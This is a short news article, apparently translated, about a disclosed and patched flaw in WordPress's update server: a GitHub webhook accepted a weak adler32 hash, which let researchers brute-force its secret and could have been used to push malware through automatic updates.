WordPress fixes serious vulnerability in update mechanism

WordPress has fixed a serious security issue after researchers reported it to Automattic. The vulnerability made it possible to send malware to WordPress sites, which make up 27 percent of the Internet, through the automatic update feature.

Security company Wordfence writes that every WordPress site sends a request to the update server every hour to check whether a new version of the cms and related software is available. The server then sends a reply with a url if there are indeed new versions. Because an attacker penetrates the update server, it is possible to adapt this URL to malicious software, the security company writes. The number of affected sites would be large, because the automatic update function is enabled by default.

The leak is related to a webhook, which allows WordPress developers to store source code on GitHub. The moment they add code on GitHub, this function contacts the update server, which then sends out notifications. According to the security company, the PHP code of this feature contained a vulnerability that could allow an attacker to run arbitrary code on the update server. Because the webhook allows the attacker to choose a hashing algorithm for authentication, it was possible to choose a weak algorithm and then perform a brute force attack on it.

In this way, it was possible within a few hours to find out the shared secret using the adler32 algorithm and thus gain access to the update server. Automattic already closed the leak in September and provided the security company with a reward. The researchers remain critical of the role of the WordPress update server, because it is a single point of failure. Other parties have also criticized the system, a researcher recently announced his displeasure via a mailing list.